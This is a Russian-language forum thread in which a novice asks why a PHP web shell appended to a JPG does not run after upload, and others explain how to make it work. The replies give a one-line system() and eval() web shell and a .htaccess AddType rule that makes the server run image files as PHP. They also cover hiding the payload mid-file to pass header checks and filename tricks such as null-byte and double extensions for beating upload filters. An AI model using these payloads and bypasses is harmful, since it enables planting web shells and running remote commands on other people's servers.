Подскажите в чем проблема
Открываю в блокноте картинку добавляю в конец <?php system($_GET["cmd"]); ?>
заливаю на саит картинку
но когда пишу site.com/image.jpg?cmd=phpinfo();
нифига нет картинку показывает и все
Что делаю не так ?
Еще вопрос
Сменил расширение у шела на .jpg
залил как им воспользоваться? когда обращаюсь по адресу site.com/shell.jpg ничего непоказывает
Сори нубяра полный пытаюсь разобраться гуглю по теме ну пока ответы ненашол
Естесвенно ничего не будет. Ведь по умолчанию .jpg файл как php скрипт не будет интерпретироваться Веб сервером (Apache, nginx).
Следовательно надо сделать что-бы он это интерпретировал. Самый легкий метод, если есть возможность залития файлов, это залитие файла
.htaccess с содержанием:
addtype application/x-httpd-php .php .jpg .jpeg .png
Сначала льешь его, потом уже свою картинку (Шелл), и переходишь на него.
И кстате, лучше через
WINHEX записывать в середину код:
<?PHP eval($_GET['c']); ?>
Ибо зачастую самописные "чекеры" формата файла, смотрят по заголовку (Черная стрелка) (Объявление файла зависит от его формата)
Красным уже код.
На моем опыте часто такое вканывало, если не срабатывали другие методы.
Извините что апаю старый топик, но больно часто спрашивают.
И совет
sergaj (Не в обиду, бредовый, хоть раз пробывал такое делать? Лишь второй вариант имеет свойство срабатывать иногда, остальное бред ИМХО )
shell.php.jpg
shell.jpg.php
shell.php%00.jpg
и другие вариации...
вбей в гугле - залив шелла через картинку
способов кучи - что-нить найдешь.
Спасибо за внимание.